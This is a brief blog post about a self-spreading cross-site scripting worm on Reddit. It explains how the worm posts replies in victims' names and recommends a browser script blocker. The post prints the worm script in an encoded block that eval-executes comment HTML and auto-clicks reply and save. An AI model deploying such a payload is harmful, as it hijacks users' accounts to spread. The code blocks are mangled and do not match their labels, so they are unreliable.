Playing around in Reddit tonight I found several threads being attacked by what appears to be an XSS (cross site scripting) virus. If you go to these threads and view the code being put out by the script, it will take over your commenting and replies for the thread outputing the same code.
The best thing to do now if you are a Reddit user is to install No Script for Firefox.
Update: From Reddit
They seem to have converted some javascript code into html escaped characters and got the browser to interpret it somehow. When I open my received messages it instantly tries to post a reply to every message on that page thus spreading itself.
Edit – there was a submission to programming earlier today (I think) that I can no longer find that had a similar if much less sophisticated attack. That one relied on people being stupid enough to copy and paste the code into the brower address bar. I suppose someone found an exploit and used his idea.
Decoding the script which is URL encoded gives us this;
[[code]]czo1Mjg6XCJbeF1bYl0NCltiXTovWw0Kej1cXFwiW3hdW2JdXFxcXG5bYl06L1tcXFwiK3RoaXMuaW5uZXJIVE1MK1xcXCJdKC9vbm1vdXNlb3ZlcntbJiomXX09ZXZhbCh1bmVzY2FwZSggICAgdGhpcy5pbm5lckhUTUwpKS8vKVxcXCI7DQpvPWRvY3VtZW50O2U9by5nZXRFbGVtZW50c0J5VGFnTmF7WyYqJl19bWUoXFxcJ2FcXFwnKTsNCmZvcihpPTA7aSZsdDtlLmxlbmd0aDtpKyspaWYgKGVbaV0uaW5uZXJIVE1MPT1cXFwncmVwbHlcXFwnKSQoZVtpXSkue1smKiZdfWNsaWNrKCk7DQpvPWRvY3VtZW50O2U9by5nZXRFbGVtZW50c0J5VGFnTmFtZShcXFwndGV4dGFyZWFcXFwnKTsNCmZvcihpPTA7aSZsdDtle1smKiZdfS5sZW5ndGg7aSsrKWVbaV0udmFsdWU9ejsNCmU9by5nZXRFbGVtZW50c0J5VGFnTmFtZShcXFwnYnV0dG9uXFxcJyk7DQpmb3IoaT0wO2kme1smKiZdfWx0O2UubGVuZ3RoO2krKykNCmlmIChlW2ldLmlubmVySFRNTD09XFxcJ3NhdmVcXFwnJmFtcDsmYW1wO2VbaV0uc3R5bGUuZGlzcGxheSE9e1smKiZdfVxcXCdub25lXFxcJykNCiQoZVtpXSkuY2xpY2soKTsNCl0oL29ubW91c2VvdmVyPWV2YWwodW5lc2NhcGUodGhpcy5pbm5lckhUTUwpKS8ve1smKiZdfSkNClwiO3tbJiomXX0=[[/code]]
Un-encoded it looks like;
[[code]]czo4OlwiW3hdW2JdDQpcIjt7WyYqJl19[[/code]]
Seems like the comment spam detector is removing the vast majority of it. Don’t be suprised if reddit goes down from this though.